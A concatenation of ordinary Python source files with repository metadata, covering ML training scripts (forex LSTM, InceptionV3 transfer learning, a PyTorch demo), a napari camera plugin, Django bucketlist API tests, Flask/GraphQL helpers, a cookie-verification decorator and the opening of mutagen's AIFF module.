test_true = test_data['Period_4_Lookforward'].values
test_label = np.array([test_data['Period_4_Lookforward'] == 0,test_data['Period_4_Lookforward'] == 1]).reshape((-1,2))
test_data = test_data.drop(['Period_4_Lookforward'],axis=1)
test_data = test_data.as_matrix()
test_data = test_data.reshape((-1, timesteps, num_input))
max_fails = 10
fails = 0
min_improv = .00000001
min_loss = 99
max_f1 = 0
config = tf.ConfigProto()
config.gpu_options.allow_growth=True
config.intra_op_parallelism_threads=4
config.inter_op_parallelism_threads=4
with tf.Session(config=config) as sess:
# Run the initializer
sess.run(init)
start_time = time.time()
for step in range(1, training_steps+1):
batch_x= dfs[ind]
#print(len(batch_x),'rows')
ind = (ind + 1)%(len(dfs)-1)
y_true = batch_x['Period_4_Lookforward'].values
batch_y =np.array([batch_x['Period_4_Lookforward'] == 0,batch_x['Period_4_Lookforward'] == 1]).reshape((-1,2))
batch_x = batch_x.drop(['Period_4_Lookforward'],axis=1)
            # Reshape data to (batch_size, timesteps, num_input)
batch_x = batch_x.as_matrix()
batch_x = batch_x.reshape((batch_size, timesteps, num_input))
# Run optimization op (backprop)
sess.run(train_op, feed_dict={X: batch_x, Y: batch_y})
# if(learning_rate > .0001):
# learning_rate = learning_rate/10
# optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
# train_op = optimizer.minimize(loss_op)
if step % display_step == 0 or step == 1:
# Calculate batch loss and accuracy
loss, acc,y_pred = sess.run([loss_op, accuracy,y_p], feed_dict={X: batch_x,
Y: batch_y})
loss2, acc2,test_pred = sess.run([loss_op, accuracy,y_p], feed_dict={X: test_data,
Y: test_label})
test_f1 = f1_score(test_true,test_pred)
print("Step " + "{:07d}".format(step) + ",L= " + \
"{:.6f}".format(loss) + ",Tr=" + \
"{:.3f}".format(acc) + ",Te=" + \
"{:.3f}".format(acc2) + ",F1(Tr)={:.3f}".format(f1_score(y_true,y_pred)) + \
",F1(Te)={:.8f}".format(test_f1))
if(loss < (min_loss-min_improv) or test_f1 > max_f1):
min_loss = loss
fails = 0
max_f1 = max(max_f1,test_f1)
else:
fails = fails + 1
if(fails > max_fails):
print('Ended early due to failure to improve')
break
duration = time.time() - start_time
print("\nOptimization Finished in {:.4f}s ({:0.8f} per step)\n\tMax of {:.4f}".format(duration,duration/step,max_f1))
        # Evaluate on the held-out test split
print("Final Testing Accuracy {:0.4f}%".format(f1_score(test_true,sess.run(y_p, feed_dict={X: test_data, Y: test_label}))))
last_price = 0
gain = 1
ind = 0
min_gain = 1
max_gain = 1
for row in test_data:
output = sess.run(y_p,feed_dict={X:[row]})[0]
if(output == 1):
if(last_price == 0):
last_price = closes[ind]
if(closes[ind] < last_price):
gain = gain * (1+((last_price - closes[ind]))*20)
min_gain = min(gain,min_gain)
max_gain = max(gain,max_gain)
last_price = 0
else:
if(last_price != 0):
gain = gain * (1+((last_price - closes[ind]))*20)
min_gain = min(gain,min_gain)
max_gain = max(gain,max_gain)
last_price = 0
ind = ind + 1
print(ind,"rows gives",gain)
print(min_gain," | ",max_gain)
#saver = tf.train.Saver()
#saver.save(sess, "D:\\dev\\forex_17\\model.ckpt")
| 42.936441
| 220
| 0.589954
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,909
| 0.287082
|
b0f85d4de8f913a7c50b0d59c38e3f8dc18c049b
| 2,375
|
py
|
Python
|
src/napari_live_recording/__init__.py
|
jethro33/napari-live-recording
|
6c3fcc33bd18cd090e3f89971b630d1800e29e4d
|
[
"MIT"
] | 7
|
2021-10-11T17:45:33.000Z
|
2022-02-07T16:10:42.000Z
|
src/napari_live_recording/__init__.py
|
jethro33/napari-live-recording
|
6c3fcc33bd18cd090e3f89971b630d1800e29e4d
|
[
"MIT"
] | 2
|
2021-11-01T09:00:11.000Z
|
2022-01-24T16:21:05.000Z
|
src/napari_live_recording/__init__.py
|
jethro33/napari-live-recording
|
6c3fcc33bd18cd090e3f89971b630d1800e29e4d
|
[
"MIT"
] | null | null | null |
from napari.viewer import Viewer
import napari_live_recording.devices as devices
from napari_live_recording.widgets import CameraSelection
from napari_live_recording.control import Controller
from qtpy.QtWidgets import QWidget, QFormLayout, QGroupBox
class NapariLiveRecording(QWidget):
def __init__(self, napari_viewer : Viewer) -> None:
super().__init__()
self.viewer = napari_viewer
self.mainLayout = QFormLayout()
self.selectionWidget = CameraSelection()
self.selectionWidget.setAvailableCameras(list(devices.devicesDict.keys()))
self.controller = Controller(self)
self.mainLayout.addRow(self.selectionWidget.group)
self.viewer.layers.events.removed.connect(self.controller.clearAlbumBuffer)
# Creates a new camera object and passes it to the controller
# whenever the add button is pressed
self.selectionWidget.newCameraRequested.connect(self.addNewCamera)
self.controller.cameraDeleted.connect(self.deleteCameraWidget)
self.setLayout(self.mainLayout)
def addNewCamera(self, type: str, name, idx: str) -> None:
camera = devices.devicesDict[type](name, idx)
self.mainLayout.addRow(self.controller.addCamera(camera))
def deleteCameraWidget(self, widget: QGroupBox) -> None:
self.mainLayout.removeRow(widget)
def refreshViewer(self, img, layerName) -> None:
""" Slot triggered every time a camera acquires a frame.
Creates a new layer on the viewer with the received image as content.
If the layer already exists, it updates its content.
Args:
img (np.ndarray): image data.
layerName (str): name of the layer to create/update.
"""
if img is not None:
try:
                # layer is recreated in case the image changes type (i.e. grayscale -> RGB and vice versa)
if img.ndim != self.viewer.layers[layerName].data.ndim:
self.viewer.layers.remove(layerName)
self.viewer.add_image(img, name = layerName)
else:
self.viewer.layers[layerName].data = img
except KeyError:
# needed in case the layer of that live recording does not exist
self.viewer.add_image(img, name = layerName)
| 45.673077
| 105
| 0.663579
| 2,123
| 0.893895
| 0
| 0
| 0
| 0
| 0
| 0
| 579
| 0.243789
|
b0f8a636893a665d94b32f86e052882874326b1a
| 4,277
|
py
|
Python
|
Chapter08/inceptionV3.py
|
wikibook/deep-learning-reference
|
18d2ca2ded4256b2ddbac6e76d57531ca13e6e30
|
[
"MIT"
] | 2
|
2020-02-13T05:45:20.000Z
|
2020-04-11T05:58:02.000Z
|
Chapter08/inceptionV3.py
|
wikibook/deep-learning-reference
|
18d2ca2ded4256b2ddbac6e76d57531ca13e6e30
|
[
"MIT"
] | null | null | null |
Chapter08/inceptionV3.py
|
wikibook/deep-learning-reference
|
18d2ca2ded4256b2ddbac6e76d57531ca13e6e30
|
[
"MIT"
] | null | null | null |
# Deep Learning Quick Reference Chapter 8: Transfer Learning
# Mike Bernico <mike.bernico@gmail.com>
# seed random number generators before importing keras
import numpy as np
np.random.seed(42)
import tensorflow as tf
tf.set_random_seed(42)
from keras.applications.inception_v3 import InceptionV3
from keras.models import Model
from keras.layers import Dense, GlobalAveragePooling2D
from keras.callbacks import TensorBoard, EarlyStopping, CSVLogger, ModelCheckpoint
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import SGD
import os
import argparse
def build_model_feature_extraction():
# create the base pre-trained model
base_model = InceptionV3(weights='imagenet', include_top=False)
# add a global spatial average pooling layer
x = base_model.output
x = GlobalAveragePooling2D()(x)
# let's add a fully-connected layer
x = Dense(1024, activation='relu')(x)
# and a logistic layer
predictions = Dense(1, activation='sigmoid')(x)
# this is the model we will train
model = Model(inputs=base_model.input, outputs=predictions)
# first: train only the top layers (which were randomly initialized)
# i.e. freeze all convolutional InceptionV3 layers
for layer in base_model.layers:
layer.trainable = False
# compile the model (should be done *after* setting layers to non-trainable)
model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])
return model
def build_model_fine_tuning(model, learning_rate=0.0001, momentum=0.9):
for layer in model.layers[:249]:
layer.trainable = False
for layer in model.layers[249:]:
layer.trainable = True
model.compile(optimizer=SGD(lr=learning_rate, momentum=momentum), loss='binary_crossentropy', metrics=['accuracy'])
return model
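# Quick illustrative sanity check (not part of the training flow): after stage 2,
# count how many layers were actually unfrozen.
#   m = build_model_fine_tuning(build_model_feature_extraction())
#   print(sum(1 for layer in m.layers if layer.trainable), "of", len(m.layers), "layers trainable")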
def create_callbacks(name):
tensorboard_callback = TensorBoard(log_dir=os.path.join(os.getcwd(), "tb_log", name), write_graph=True, write_grads=False)
checkpoint_callback = ModelCheckpoint(filepath="./model-weights" + name + ".{epoch:02d}-{val_loss:.6f}.hdf5", monitor='val_loss',
verbose=0, save_best_only=True)
return [tensorboard_callback, checkpoint_callback]
def setup_data(train_data_dir, val_data_dir, img_width=299, img_height=299, batch_size=16):
train_datagen = ImageDataGenerator(rescale=1./255)
val_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='binary')
validation_generator = val_datagen.flow_from_directory(
val_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='binary')
return train_generator, validation_generator
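# Note: flow_from_directory infers the two classes from sub-directory names, so each
# split is expected to contain one folder per class, e.g. data/train/<class_a>/ and
# data/train/<class_b>/ (placeholder names).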
def main():
data_dir = "data/train/"
val_dir = "data/val/"
epochs = 10
batch_size = 30
model = build_model_feature_extraction()
train_generator, val_generator = setup_data(data_dir, val_dir)
callbacks_fe = create_callbacks(name='feature_extraction')
callbacks_ft = create_callbacks(name='fine_tuning')
# stage 1 fit
model.fit_generator(
train_generator,
steps_per_epoch=train_generator.n // batch_size,
epochs=epochs,
validation_data=val_generator,
validation_steps=val_generator.n // batch_size,
callbacks=callbacks_fe,
verbose=1)
scores = model.evaluate_generator(val_generator, steps=val_generator.n // batch_size)
print("Step 1 Scores: Loss: " + str(scores[0]) + " Accuracy: " + str(scores[1]))
# stage 2 fit
model = build_model_fine_tuning(model)
model.fit_generator(
train_generator,
steps_per_epoch=train_generator.n // batch_size,
epochs=epochs,
validation_data=val_generator,
validation_steps=val_generator.n // batch_size,
callbacks=callbacks_ft,
verbose=2)
scores = model.evaluate_generator(val_generator, steps=val_generator.n // batch_size)
print("Step 2 Scores: Loss: " + str(scores[0]) + " Accuracy: " + str(scores[1]))
if __name__ == "__main__":
main()
| 34.491935
| 133
| 0.710545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 862
| 0.201543
|
b0f8d8e1a99343fc9166ec575752cd7be6e45cee
| 827
|
py
|
Python
|
Pytorch/5-CNN/nn_Sequential.py
|
pengchenyu111/PaperCodeReplication
|
7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a
|
[
"Apache-2.0"
] | null | null | null |
Pytorch/5-CNN/nn_Sequential.py
|
pengchenyu111/PaperCodeReplication
|
7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a
|
[
"Apache-2.0"
] | null | null | null |
Pytorch/5-CNN/nn_Sequential.py
|
pengchenyu111/PaperCodeReplication
|
7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch import nn
from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
from torch.utils.tensorboard import SummaryWriter
class Tudui(nn.Module):
def __init__(self):
super(Tudui, self).__init__()
self.model1 = Sequential(
Conv2d(3, 32, 5, padding=2),
MaxPool2d(2),
Conv2d(32, 32, 5, padding=2),
MaxPool2d(2),
Conv2d(32, 64, 5, padding=2),
MaxPool2d(2),
Flatten(),
Linear(1024, 64),
Linear(64, 10)
)
def forward(self, x):
x = self.model1(x)
return x
tudui = Tudui()
print(tudui)
input = torch.ones((64, 3, 32, 32))
output = tudui(input)
print(output.shape)
writer = SummaryWriter("./logs")
writer.add_graph(tudui, input)
writer.close()
| 22.972222
| 67
| 0.584039
| 483
| 0.584039
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.009674
|
b0fb6f704b8d712fad268b480c2d25cc8bc409f5
| 1,232
|
py
|
Python
|
src/brewlog/utils/query.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 3
|
2019-03-11T04:30:06.000Z
|
2020-01-26T03:21:52.000Z
|
src/brewlog/utils/query.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 23
|
2019-02-06T20:37:37.000Z
|
2020-06-01T07:08:35.000Z
|
src/brewlog/utils/query.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | null | null | null |
from typing import Optional
from flask import url_for
from flask_sqlalchemy import BaseQuery
from ..ext import db
from ..models import Brew, BrewerProfile
def public_or_owner(query: BaseQuery, user: Optional[BrewerProfile]) -> BaseQuery:
"""Filter Brew query of all non-accessible objects.
:param query: query over Brew objects
:type query: BaseQuery
:param user: actor object, may be None
:type user: Optional[BrewerProfile]
:return: filtered query
:rtype: BaseQuery
"""
if user is not None:
query = query.filter(
db.or_(
BrewerProfile.id == user.id,
db.and_(BrewerProfile.is_public.is_(True), Brew.is_public.is_(True))
)
)
else:
query = query.filter(
BrewerProfile.is_public.is_(True), Brew.is_public.is_(True)
)
return query
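# Illustrative call (the join is an assumption about how callers build the query):
#   brews = public_or_owner(Brew.query.join(BrewerProfile), current_user).all()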
def search_result(query, endpoint, attr_name):
res = []
id_col = query.column_descriptions[0]['entity'].id
name_col = query.column_descriptions[0]['entity'].name
for obj_id, obj_name in query.values(id_col, name_col):
kw = {attr_name: obj_id}
res.append({'name': obj_name, 'url': url_for(endpoint, **kw)})
return res
| 29.333333
| 84
| 0.649351
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 289
| 0.234578
|
b0fda5ff40de8e081dd602a278f08974ff524613
| 11,355
|
py
|
Python
|
adventures/bucketlist/tests/test_api.py
|
lakivisi-zz/adventures
|
f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5
|
[
"MIT"
] | null | null | null |
adventures/bucketlist/tests/test_api.py
|
lakivisi-zz/adventures
|
f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5
|
[
"MIT"
] | null | null | null |
adventures/bucketlist/tests/test_api.py
|
lakivisi-zz/adventures
|
f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5
|
[
"MIT"
] | 1
|
2021-01-14T21:27:32.000Z
|
2021-01-14T21:27:32.000Z
|
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from bucketlist.models import Bucketlist, Item
from bucketlist.tests.factories import (BucketlistFactory,
UserFactory,
ItemFactory)
# Create your tests here.
class RegisterApiTestSuite(APITestCase):
def setUp(self):
self.user = UserFactory.build()
def test_user_can_register_with_correct_credentials(self):
url = reverse('register')
data = {'username': self.user.username,
'email': self.user.email,
'password': self.user.password}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertIn(
'"username":"{}","email":"{}"'.format(
self.user.username,
self.user.email),
str(response.content))
# test_user_cant_register_twice
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, 400)
self.assertIn(
'"username":["A user with that username already exists."]',
str(response.content))
def test_user_cant_register_with_wrong_credentials(self):
url = reverse('register')
data = {'username': self.user.username,
'email': "wq",
'password': self.user.password}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, 400)
self.assertIn(
'"email":["Enter a valid email address."]',
str(response.content))
def test_user_cant_register_with_blank_credentials(self):
url = reverse('register')
data = {'username': ' ',
'email': ' ',
'password': ' '}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, 400)
self.assertIn(
'"username":["This field may not be blank."]',
str(response.content))
class LoginAPITestSuite(APITestCase):
def setUp(self):
self.user = UserFactory.build()
url = reverse('register')
data = {'username': self.user.username,
'email': self.user.email,
'password': self.user.password}
self.client.post(url, data, format='json')
self.url = reverse('login')
self.data = {'username': self.user.username,
'password': self.user.password}
def test_registered_user_can_login(self):
response = self.client.post(self.url, self.data, format='json')
self.assertEqual(response.status_code, 200)
self.assertIn('token', str(response.content))
def test_login_with_blank_credentials(self):
response = self.client.post(
self.url,
{'username': '', 'password': ''},
format='json')
self.assertEqual(response.status_code, 400)
self.assertIn(
'"username":["This field may not be blank."]',
str(response.content))
self.assertIn(
'"password":["This field may not be blank."]',
str(response.content))
def test_login_with_wrong_credentials(self):
response = self.client.post(self.url,
{'username': 'loice', 'password': 'loice'},
format='json')
self.assertEqual(response.status_code, 400)
self.assertIn('Unable to login with provided credentials',
str(response.content))
class BucketlistAPITestSuite(APITestCase):
def setUp(self):
self.user = UserFactory.build()
bucketlists = BucketlistFactory.build_batch(2)
self.bucketlist1 = bucketlists[0]
self.bucketlist2 = bucketlists[1]
# register a user
url = reverse('register')
data = {'username': self.user.username,
'email': self.user.email,
'password': self.user.password}
self.client.post(url, data, format='json')
# login user
response = self.client.post(reverse('login'),
{'username': self.user.username,
'password': self.user.password},
format='json'
)
self.token = response.data['token']
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# add one bucketlist
self.data = {'name': self.bucketlist2.name,
'description': self.bucketlist2.description}
response = self.client.post(
reverse('bucketlists'),
self.data,
format='json')
self.bucketlist = Bucketlist.objects.get(name=self.bucketlist2.name)
def test_user_can_create_bucketlist(self):
url = reverse('bucketlists')
data = {'name': self.bucketlist1.name,
'description': self.bucketlist1.description}
response = self.client.post(url,
data,
format='json')
data = response.data
self.assertIsNotNone(data['id'])
self.assertEqual(data['name'], self.bucketlist1.name)
def test_user_cant_create_bucketlist_with_same_name(self):
response = self.client.post(reverse('bucketlists'),
self.data,
format='json')
data = response.data
self.assertEqual(data['name'], ["bucketlist already exists"])
def test_can_list_bucketlists(self):
response = self.client.get(reverse('bucketlists'))
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual(self.bucketlist2.name, data[0]['name'])
def test_can_list_one_bucketlist(self):
response = self.client.get(
reverse('one_bucketlist', kwargs={'pk': self.bucketlist.id}))
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual(self.bucketlist2.name, data['name'])
def test_can_edit_one_bucketlist(self):
response = self.client.put(
reverse('one_bucketlist', kwargs={'pk': self.bucketlist.id}),
{'name': 'holiday',
'description': self.bucketlist2.description},
format='json')
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual('holiday', data['name'])
def test_can_delete_one_bucketlist(self):
response = self.client.delete(
reverse('one_bucketlist', kwargs={'pk': 1}))
self.assertEqual(response.status_code, 204)
response = self.client.get(
reverse('one_bucketlist', kwargs={'pk': 1}),
headers={'Authorization': 'JWT ' + self.token})
data = response.data
self.assertEqual(response.status_code, 404)
self.assertEqual("Not found.", data["detail"])
class ItemAPITestSuite(APITestCase):
def setUp(self):
self.user = UserFactory.build()
bucketlist = BucketlistFactory.build()
items = ItemFactory.build_batch(2)
self.item1 = items[0]
self.item2 = items[1]
# register a user
url = reverse('register')
data = {'username': self.user.username,
'email': self.user.email,
'password': self.user.password}
self.client.post(url, data, format='json')
# login user
response = self.client.post(reverse('login'),
{'username': self.user.username,
'password': self.user.password},
format='json'
)
self.token = response.data['token']
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# add one bucketlist
data = {'name': bucketlist.name,
'description': bucketlist.description}
self.client.post(
reverse('bucketlists'), data, format='json')
self.bucketlist = Bucketlist.objects.get(name=bucketlist.name)
self.data = {'name': self.item1.name,
'description': self.item1.description,
'completed': self.item1.completed}
self.client.post(reverse('items', kwargs={'bucketlist_id': self.bucketlist.id}),
self.data,
format='json')
self.item = Item.objects.get(
name=self.item1.name, bucketlist=self.bucketlist)
def test_user_can_create_item(self):
url = reverse('items', kwargs={'bucketlist_id': self.bucketlist.id})
data = {'name': self.item2.name,
'description': self.item2.description,
'completed': self.item2.completed}
response = self.client.post(url, data, format='json')
data = response.data
self.assertIsNotNone(data['id'])
self.assertEqual(data['name'], self.item2.name)
def test_user_cant_create_item_with_same_name_in_one_bucketlist(self):
url = reverse('items', kwargs={'bucketlist_id': self.bucketlist.id})
response = self.client.post(url, self.data, format='json')
data = response.data
self.assertEqual(data['name'], ["item already exists in bucketlist"])
def test_can_list_bucketlist_items(self):
url = reverse('items', kwargs={'bucketlist_id': self.bucketlist.id})
response = self.client.get(url)
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual(self.item1.name, data[0]['name'])
def test_can_list_one_bucketlist_item(self):
url = reverse('one_item', kwargs={'bucketlist_id': self.bucketlist.id,
'pk': self.item.id})
response = self.client.get(url)
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual(self.item1.name, data['name'])
def test_can_edit_one_bucketlist_item(self):
url = reverse('one_item', kwargs={'bucketlist_id': self.bucketlist.id,
'pk': self.item.id})
response = self.client.put(url,
{'name': 'israel trip',
'description': self.item1.description,
'completed': self.item1.completed},
format='json')
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual('israel trip', data['name'])
def test_can_delete_one_bucketlist_item(self):
url = reverse('one_item', kwargs={'bucketlist_id': self.bucketlist.id,
'pk': self.item.id})
response = self.client.delete(url)
self.assertEqual(response.status_code, 204)
response = self.client.get(url)
data = response.data
self.assertEqual(response.status_code, 404)
self.assertEqual("Not found.", data["detail"])
| 41.593407
| 88
| 0.574813
| 10,993
| 0.96812
| 0
| 0
| 0
| 0
| 0
| 0
| 1,716
| 0.151123
|
b0fdbad819a58bb24f68fffc89eae7b13da8ac0a
| 514
|
py
|
Python
|
src/model/match.py
|
HarborYuan/Student-Information-Management-System
|
7226bdea9a422cc88876ba58f1e36e4f7087342d
|
[
"Apache-2.0"
] | null | null | null |
src/model/match.py
|
HarborYuan/Student-Information-Management-System
|
7226bdea9a422cc88876ba58f1e36e4f7087342d
|
[
"Apache-2.0"
] | null | null | null |
src/model/match.py
|
HarborYuan/Student-Information-Management-System
|
7226bdea9a422cc88876ba58f1e36e4f7087342d
|
[
"Apache-2.0"
] | 1
|
2018-12-03T11:43:37.000Z
|
2018-12-03T11:43:37.000Z
|
import re
class IsCellphone():
def __init__(self):
self.p = re.compile(r'[1][^1269]\d{9}')
def iscellphone(self, number):
res = self.p.match(number)
if res:
return True
else:
return False
class IsMail():
def __init__(self):
self.p = re.compile(r'[^\._][\w\._-]+@(?:[A-Za-z0-9]+\.)+[A-Za-z]+$')
def ismail(self, str):
res = self.p.match(str)
if res:
return True
else:
return False
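# A minimal usage sketch of the two validators above; the sample phone number
# and addresses are made up purely for illustration.
if __name__ == "__main__":
    phone_checker = IsCellphone()
    mail_checker = IsMail()
    print(phone_checker.iscellphone("13812345678"))  # True: leading 1, then 10 more digits
    print(phone_checker.iscellphone("12345678901"))  # False: second digit 2 is excluded
    print(mail_checker.ismail("harbor.yuan@example.com"))  # True
    print(mail_checker.ismail("not-an-email"))  # False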
| 19.769231
| 77
| 0.486381
| 498
| 0.968872
| 0
| 0
| 0
| 0
| 0
| 0
| 66
| 0.128405
|
b0feb9c47583568b91cc55ff1a17eb9a915a0f41
| 1,626
|
py
|
Python
|
framework/repository/info.py
|
jarret/bitcoin_helpers
|
4b6155ea3b004ad58a717b36cd58138d058281b1
|
[
"MIT"
] | null | null | null |
framework/repository/info.py
|
jarret/bitcoin_helpers
|
4b6155ea3b004ad58a717b36cd58138d058281b1
|
[
"MIT"
] | null | null | null |
framework/repository/info.py
|
jarret/bitcoin_helpers
|
4b6155ea3b004ad58a717b36cd58138d058281b1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import json
import os
import sys
from framework.path.path import Path
from framework.file.io import read_file
from framework.git.path import GitPath
REPO_INFO_FILENAME = ".bitcoin-maintainer-tools.json"
FAILBACK_REPO_INFO_FILENAME = ".fallback-bitcoin-maintainer-tools.json"
class RepositoryInfo(dict):
"""
Dictionary that is sourced from a json file in the target repository.
If the file doesn't exist, a fallback file is used for the settings.
"""
def __init__(self, repository_base):
super().__init__()
json_file = os.path.join(repository_base, REPO_INFO_FILENAME)
path = Path(json_file)
if not path.exists():
# If there is no .json file in the repo, it might be an old version
# checked out. We can still do best-effort with a default file
# that is located in this repo.
json_file = self._failback_file()
path = Path(json_file)
if not path.exists():
sys.exit("Could not find a .json repository info file to use.")
path.assert_is_file()
path.assert_mode(os.R_OK)
content = read_file(json_file)
self.update(json.loads(content))
def _failback_file(self):
gp = GitPath(os.path.abspath(os.path.realpath(__file__)))
return os.path.join(str(gp.repository_base()),
FAILBACK_REPO_INFO_FILENAME)
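# A minimal usage sketch of RepositoryInfo; the repository path and the
# "project_name" key are hypothetical and only illustrate dict-style access.
if __name__ == "__main__":
    info = RepositoryInfo("/path/to/target/repository")
    print(info.get("project_name", "<not set>"))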
| 36.954545
| 79
| 0.674662
| 1,136
| 0.698647
| 0
| 0
| 0
| 0
| 0
| 0
| 649
| 0.399139
|
b0ff358c2ba4c5c042b20c8c472910cebd571e0f
| 861
|
py
|
Python
|
backend/members/schema.py
|
singsaker/intern
|
9376732c6d537f46443ad43afa51e82df2005da8
|
[
"MIT"
] | 4
|
2021-10-06T19:09:12.000Z
|
2022-03-28T12:14:42.000Z
|
backend/members/schema.py
|
singsaker/intern
|
9376732c6d537f46443ad43afa51e82df2005da8
|
[
"MIT"
] | 2
|
2021-11-30T16:07:05.000Z
|
2022-02-17T23:57:00.000Z
|
backend/members/schema.py
|
singsaker/intern
|
9376732c6d537f46443ad43afa51e82df2005da8
|
[
"MIT"
] | null | null | null |
import graphene
import graphql_jwt
from .resolvers import MemberResolvers
from .types import MemberType, UserType
class MemberQueries(graphene.ObjectType, MemberResolvers):
member = graphene.Field(MemberType, id=graphene.ID(required=True))
all_users = graphene.List(UserType)
all_members = graphene.List(MemberType)
all_active_members = graphene.List(MemberType)
user = graphene.Field(UserType)
user_details = graphene.Field(UserType)
send_email = graphene.Field(UserType)
class UserMutations(graphene.ObjectType):
token_auth = graphql_jwt.ObtainJSONWebToken.Field()
verify_token = graphql_jwt.Verify.Field()
refresh_token = graphql_jwt.Refresh.Field()
delete_token_cookie = graphql_jwt.DeleteJSONWebTokenCookie.Field()
# Mulig bare romsjef skal ha mulighet til dette?
# create_user = CreateUser.Field()
| 34.44
| 70
| 0.773519
| 740
| 0.859466
| 0
| 0
| 0
| 0
| 0
| 0
| 82
| 0.095238
|
b0ffaa7976be25e795d5abe04edf6fd2fd0631eb
| 1,540
|
py
|
Python
|
cookie_manager/security_decorator.py
|
ScholarPack/cookie-manager
|
342eaf19d4ebbe83319306e4a3afcc3988f61d3d
|
[
"MIT"
] | 10
|
2020-02-26T14:13:05.000Z
|
2021-07-30T02:16:47.000Z
|
cookie_manager/security_decorator.py
|
ScholarPack/cookie-manager
|
342eaf19d4ebbe83319306e4a3afcc3988f61d3d
|
[
"MIT"
] | 13
|
2020-02-26T10:42:09.000Z
|
2021-09-30T13:26:23.000Z
|
cookie_manager/security_decorator.py
|
ScholarPack/cookie-manager
|
342eaf19d4ebbe83319306e4a3afcc3988f61d3d
|
[
"MIT"
] | 3
|
2020-03-29T00:49:23.000Z
|
2020-07-24T16:26:20.000Z
|
from functools import wraps
from typing import List, Any
from cookie_manager import CookieManager
class CookieSecurityDecorator:
_cookie_manager = None
_request = None
_cookie_name = None
def init_app(self, request: Any, cookie_manager: CookieManager, cookie_name: str):
"""
Initialise the security decorators
:param request: An object with the attribute `cookies`
:param cookie_manager: The instance of the cookie manager to be used for the decorator
:param cookie_name: The name of the cookie to read from the request
"""
self._request = request
self._cookie_manager = cookie_manager
self._cookie_name = cookie_name
def keys_required(self, keys: List = []):
"""
:param keys: A list of cookie signing keys that are allowed to use a decorated endpoint.
:raises Unauthorized: When the route is accessed without a valid key id
:return: wrapper
"""
def route_wrapper(f):
@wraps(f)
def wrapper(*args, **kwds):
                verified_cookie = self._cookie_manager.verify(
                    signed_cookie=self._request.cookies.get(self._cookie_name)
                )
                key_id = verified_cookie.get("key_id")
if len(keys) == 0 or key_id in keys:
return f(*args, **kwds)
else:
raise self._cookie_manager._exceptions.Unauthorized()
return wrapper
return route_wrapper
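# A minimal, runnable sketch of how keys_required gates a function. It uses tiny
# stand-ins for the request and the cookie manager instead of a real web
# framework; every name below is illustrative and not part of the library.
if __name__ == "__main__":
    class _FakeCookieManager:
        """Pretends every cookie verifies and was signed with key id 'service-a'."""
        class _exceptions:
            class Unauthorized(Exception):
                pass
        def verify(self, signed_cookie):
            return {"key_id": "service-a", "payload": signed_cookie}
    class _FakeRequest:
        cookies = {"session": "dummy-signed-cookie"}
    security = CookieSecurityDecorator()
    security.init_app(request=_FakeRequest(),
                      cookie_manager=_FakeCookieManager(),
                      cookie_name="session")
    @security.keys_required(keys=["service-a"])
    def protected_view():
        return "allowed"
    print(protected_view())  # prints "allowed" because key id 'service-a' is whitelisted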
| 34.222222
| 96
| 0.619481
| 1,439
| 0.934416
| 0
| 0
| 456
| 0.296104
| 0
| 0
| 517
| 0.335714
|
7c0015d18f7709ad1f58810e4e4fbcf0c3ae1358
| 6,394
|
py
|
Python
|
mutagen/aiff.py
|
lucienimmink/scanner.py
|
cecaa0a570ba8058321dea1c8efa9f77868effb3
|
[
"MIT"
] | 2
|
2022-03-14T15:34:14.000Z
|
2022-03-23T17:05:42.000Z
|
mutagen/aiff.py
|
lucienimmink/scanner.py
|
cecaa0a570ba8058321dea1c8efa9f77868effb3
|
[
"MIT"
] | null | null | null |
mutagen/aiff.py
|
lucienimmink/scanner.py
|
cecaa0a570ba8058321dea1c8efa9f77868effb3
|
[
"MIT"
] | 2
|
2020-09-17T08:27:12.000Z
|
2021-08-23T11:13:52.000Z
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Evan Purkhiser
# 2014 Ben Ockmore
# 2019-2020 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""AIFF audio stream information and tags."""
import struct
from struct import pack
from mutagen import StreamInfo, FileType
